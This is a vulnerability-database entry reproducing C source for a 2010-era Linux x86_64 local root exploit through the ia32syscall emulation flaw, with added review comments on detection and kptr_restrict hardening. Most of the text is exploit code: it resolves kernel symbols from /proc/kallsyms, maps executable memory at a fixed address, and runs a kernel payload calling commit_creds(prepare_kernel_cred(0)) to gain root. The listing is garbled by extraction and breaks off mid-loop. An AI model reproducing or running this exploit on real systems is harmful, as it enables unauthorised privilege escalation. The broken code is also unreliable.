Linux 2.6.3* x86_64 (2010) local root exploit - vulnerability warning - the black bar safety net

2011-10-29T00:00:00
ID MYHACK58:62201132181
Type myhack58
Reporter 佚名
Modified 2011-10-29T00:00:00

Description

Test environment: Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)

  • Result;

  • id

  • uid=0(root) gid=0(root)

*

  • 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )

*

  • If y0u g37 3Rr0R > ./ 1 3 3 7

  • symbol table not available, aborting!

  • Process finished < O_o

  • C4usE 3xpl017 Re4dS "/proc/kallsyms" | "/proc/ksyms" , iF n07 4va1bl3! iT g1ve5 ErRoR O_o

*

  • Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !

  • Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !

*/

include <sys/types. h>

include <sys/wait. h>

include <sys/ptrace. h>

include <inttypes. h>

include <sys/reg. h>

include <unistd. h>

include <stdio. h>

include <stdlib. h>

include <sys/mman. h>

include <string. h>

/* Function-pointer types for the two kernel credential helpers the
 * kernel-mode payload calls. They are resolved by name at runtime from
 * the kernel symbol table (see get_symbol()) and stored in the globals
 * below; docall() fills them in before the payload runs. */
typedef int attribute((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long attribute((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/* Resolved kernel function addresses; 0 until docall() succeeds. */
_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

/* Kernel-mode payload. Replaces the calling task's credentials with a
 * fresh root credential set — commit_creds(prepare_kernel_cred(0)) is the
 * classic privilege-escalation primitive, and the "uid=0(root)" result in
 * the header is the outcome. The file/vma parameters are not used.
 *
 * NOTE(review): for detection, the signal is an unprivileged process
 * becoming uid 0 without any setuid exec in between. Recent mainline
 * kernels also harden prepare_kernel_cred() so a NULL argument no longer
 * yields init credentials — confirm for the kernel in question. */
int kernelmodecode(void file, void vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

/*
 * Resolve a kernel symbol address by name from the running kernel's
 * exported symbol table.
 *
 * Reads /proc/kallsyms ("<addr> <type> <name>" lines) or, when that is
 * absent, the older /proc/ksyms format ("<addr> <name>"); in the old
 * format module-qualified names are skipped and a versioned "smp" suffix
 * appears to be trimmed before comparison. Returns the address on a match
 * (also printed), or 0 when neither file could be opened or the name was
 * not found.
 *
 * NOTE(review): this step is what lets the exploit adapt itself to the
 * target kernel, and it is also the step that kernel.kptr_restrict
 * defeats — unprivileged readers then see zeroed addresses, which is the
 * "symbol table not available" abort the header above describes.
 * The listing below is garbled in places by extraction (spaced digits,
 * dropped characters); it is annotated as-is, not repaired.
 */
unsigned long

get_symbol(char *name)

{

FILE *f;

unsigned long addr;

char dummy;  /* symbol-type column of /proc/kallsyms, discarded */

char sname[5 1 2];

int ret = 0, oldstyle = 0;  /* oldstyle: fell back to /proc/ksyms */

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

return 0;

oldstyle = 1;

}

while (ret != EOF) {

if (! oldstyle) {

ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);

} else {

ret = fscanf(f, "%p %s\n", (void **) &addr, sname);

if (ret == 2) {

char *p;

/* Skip names carrying old-style module markers. */
if (strstr(sname, "_O/") || strstr(sname, "_S.")) {

continue;

}

/* Cut the versioned suffix (the "smp" marker and what follows,
 * plus any underscores leading up to it) so the bare name compares. */
p = strrchr(sname, "_");

if (p > ((char *) sname + 5) && ! strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char )sname && (p- 1) == "_") {

p--;

}

*p = "\0";

}

}

}

/* Line did not match the format: consume one token and resync. */
if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (! strcmp(name, sname)) {

printf("ReS0lvEd sYmBoL %s 7o %p\n", name, (void *) addr);

fclose(f);

return addr;

}

}

fclose(f);

return 0;

}

static void docall(uint64_t *ptr, uint64_t size)

{

commit_creds = (_commit_creds) get_symbol("commit_creds");

if (! commit_creds) {

printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");

exit(1);

}

prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");

if (! prepare_kernel_cred) {

printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");

exit(1);

}

uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

printf("MaPpiNg at %lx\n", tmp);

if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,

MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mMap faUl7\n");

exit(1);

}

for (; (uint64_t) ptr < (tmp + size); ptr++)
